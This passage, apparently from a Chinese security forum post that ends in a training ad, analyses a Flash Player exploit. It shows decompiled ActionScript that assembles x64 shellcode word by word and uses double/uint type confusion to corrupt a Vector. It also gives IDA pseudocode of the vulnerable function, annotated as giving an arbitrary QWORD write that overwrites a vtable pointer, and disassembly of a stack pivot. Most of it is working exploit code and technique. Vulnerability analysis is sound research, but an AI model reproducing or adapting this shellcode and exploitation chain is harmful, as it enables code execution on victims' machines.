_loc_17.writeUnsignedInt(0x6f630304);
_loc_17.writeUnsignedInt(0x44c7666e);
_loc_17.writeUnsignedInt(0x67690403);
_loc_17.writeUnsignedInt(0x44c7642e);
_loc_17.writeUnsignedInt(0x6c6c0803);
_loc_17.writeUnsignedInt(0x33450000);
_loc_17.writeUnsignedInt(0x44c748c9);
_loc_17.writeUnsignedInt(0x3024);
_loc_17.writeUnsignedInt(0x8d480000);
_loc_17.writeUnsignedInt(0x808e);
_loc_17.writeUnsignedInt(0x2b84100);
_loc_17.writeUnsignedInt(0x48000000);
_loc_17.writeUnsignedInt(0xc2c7);
_loc_17.writeUnsignedInt(0x44c74000);
_loc_17.writeUnsignedInt(0x802824);
_loc_17.writeUnsignedInt(0x44c70000);
_loc_17.writeUnsignedInt(0x22024);
_loc_17.writeUnsignedInt(0x8b4c0000);
_loc_17.writeUnsignedInt(0xd2ff4116);
_loc_17.writeUnsignedInt(0x48d88b48);
_loc_17.writeUnsignedInt(0xffff883);
_loc_17.writeUnsignedInt(0x9c84);
_loc_17.writeUnsignedInt(0x4c8d4c00);
_loc_17.writeUnsignedInt(0xba484024);
_loc_17.writeUnsignedInt(_loc_12 + 900);
_loc_17.writeUnsignedInt(_loc_31);
_loc_17.writeUnsignedInt(0xb8419090);
_loc_17.writeUnsignedInt(_loc_35.length);
_loc_17.writeUnsignedInt(0x48cb8b48);
_loc_17.writeUnsignedInt(0x202444c7);
_loc_17.writeUnsignedInt(0);
_loc_17.writeUnsignedInt(0x8568b4c);
_loc_17.writeUnsignedInt(0x48d2ff41);
_loc_17.writeUnsignedInt(0x7400f883);
_loc_17.writeUnsignedInt(0xcb8b486c);
_loc_17.writeUnsignedInt(0x10568b4c);
_loc_17.writeUnsignedInt(0x48d2ff41);
_loc_17.writeUnsignedInt(0x808e8d);
_loc_17.writeUnsignedInt(0x8b4c0000);
_loc_17.writeUnsignedInt(0xff411856);
_loc_17.writeUnsignedInt(0x4852ebd2);
_loc_17.writeUnsignedInt(0x10244c8b);
_loc_17.writeUnsignedInt(0x24448b4c);
_loc_17.writeUnsignedInt(0xc9ff4808);
_loc_17.writeUnsignedInt(0x88348b41);
_loc_17.writeUnsignedInt(0x4df20348);
_loc_17.writeUnsignedInt(0x3348c933);
_loc_17.writeUnsignedInt(0xc141acc0);
_loc_17.writeUnsignedInt(0x3440dc9);
_loc_17.writeUnsignedInt(0x75c43ac8);
_loc_17.writeUnsignedInt(0xc18149f1);
_loc_17.writeUnsignedInt(0x92af16da);
_loc_17.writeUnsignedInt(0x75ca3b45);
_loc_17.writeUnsignedInt(0x448b48d8);
_loc_17.writeUnsignedInt(0x8b444024);
_loc_17.writeUnsignedInt(0x34c2440);
_loc_17.writeUnsignedInt(0x8b4166c2);
_loc_17.writeUnsignedInt(0x8b44480c);
_loc_17.writeUnsignedInt(0x34c1c40);
_loc_17.writeUnsignedInt(0x48b41c2);
_loc_17.writeUnsignedInt(0xc2034888);
_loc_17.writeUnsignedInt(0xb94990c3);
_loc_17.writeUnsignedInt(_loc_10);
_loc_17.writeUnsignedInt(_loc_31);
_loc_17.writeUnsignedInt(0x1001c741);
_loc_17.writeUnsignedInt(0x4d000000);
_loc_17.writeUnsignedInt(0xff70818d);
_loc_17.writeUnsignedInt(0x8b49ffff);
_loc_17.writeUnsignedInt(0x894901);
_loc_17.writeUnsignedInt(0x8418b49);
_loc_17.writeUnsignedInt(0x8408949);
_loc_17.writeUnsignedInt(0xb9499090);
_loc_17.writeUnsignedInt(_loc_11);
_loc_17.writeUnsignedInt(_loc_31);
_loc_17.writeUnsignedInt(0xb8419090);
_loc_17.writeUnsignedInt(_loc_16);
_loc_17.writeUnsignedInt(0x41018945);
_loc_17.writeUnsignedInt(0x441c7);
_loc_17.writeUnsignedInt(0x48000000);
_loc_17.writeUnsignedInt(0xc3a8658d);
_loc_17.writeUnsignedInt(0x90909090);
_loc_15 = (_loc_11 - _loc_10 - 16) / 8;
(_loc_5[_loc_7][_loc_22] as Vector.<Number>)[_loc_15] = this.UintToDouble(_loc_12, _loc_31);
new Number(_loc_6.toString());
return;
}
while (1)
{
}
return;
}// end function
public function randRange(param1:Number, param2:Number) : Number
{
var _loc_3:* = Math.floor(Math.random() * (param2 - param1 + 1)) + param1;
return _loc_3;
}// end function
public function empty() : void
{
var _loc_1:* = new TextField();
_loc_1.autoSize = TextFieldAutoSize.LEFT;
var _loc_2:* = new TextFormat();
_loc_2.size = 30;
_loc_2.font = "Arial";
_loc_2.color = 0xff0000;
_loc_1.setTextFormat(_loc_2);
_loc_1.text = " ";
addChild(_loc_1);
return;
}// end function
public function UintToDouble(param1:uint, param2:uint) : Number
{
var _loc_3:* = new ByteArray();
_loc_3.endian = Endian.LITTLE_ENDIAN;
_loc_3.writeInt(param1);
_loc_3.writeInt(param2);
_loc_3.position = 0;
return _loc_3.readDouble();
}// end function
public function ReadDouble(param1:Vector.<Number>, param2:uint) : Vector.<uint>
{
new Vector.<uint>(2)[0] = 0;
new Vector.<uint>(2)[1] = 0;
var _loc_3:* = new Vector.<uint>(2);
var _loc_4:* = param1[param2];
var _loc_5:* = new ByteArray();
new ByteArray().position = 0;
_loc_5.writeDouble(_loc_4);
_loc_3[1] = _loc_5[0] * 0x1000000 + _loc_5[1] * 0x10000 + _loc_5[2] * 256 + _loc_5[3];
_loc_3[0] = _loc_5[4] * 0x1000000 + _loc_5[5] * 0x10000 + _loc_5[6] * 256 + _loc_5[7];
return _loc_3;
}// end function
}
}
unsigned int __thiscall sub_1054EA10(void *this, unsigned int a2, int a3)
{
void *v3; // esi@1
int v4; // ecx@1
int v5; // ebx@1
unsigned int result; // eax@4
unsigned int v7; // esi@6
int v8; // eax@9
double v9; // [sp+Ch] [bp-8h]@1
v3 = this;
v9 = sub_10505BD0(a3);
v4 = *((_DWORD *)v3 + 6);
v5 = (int)((char *)v3 + 24);
if ( a2 >= *(_DWORD *)v4 && a2 >= *(_DWORD *)v4 - (unsigned int)*((_BYTE *)v3 + 20) + 1 )
sub_1054D2D0(v3, a2);
result = *(_DWORD *)v5;
if ( a2 >= **(_DWORD **)v5 )
{
if ( a2 <= 0xFFFFFFFE )
v7 = a2 + 1;
else
v7 = -1;
if ( result & 0xFFF )
v8 = *(_WORD *)((result & 0xFFFFF000) + 0x12);
else
v8 = sub_104A2BE0(*(_DWORD *)v5);
if ( v7 > (unsigned int)(v8 - 8) >> 3 )
sub_1051DDD0(v5, v7);
result = sub_1051B170(a2 + 1);
}
*(_QWORD *)(*(_DWORD *)v5 + 8 * a2 + 8) = *(_QWORD *)&v9; // a2和v9可控导致任意地址QWORD写从而覆盖某对象的虚函数表指针
return result;
}
08125540 8B01 mov eax, dword ptr [ecx] ; eax = 0x06944000
08125542 8B50 70 mov edx, dword ptr [eax+70] ; edx = 0x084CDC60
08125545 FFD2 call edx
084CDC60 94 xchg eax, esp ; stackpivot
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
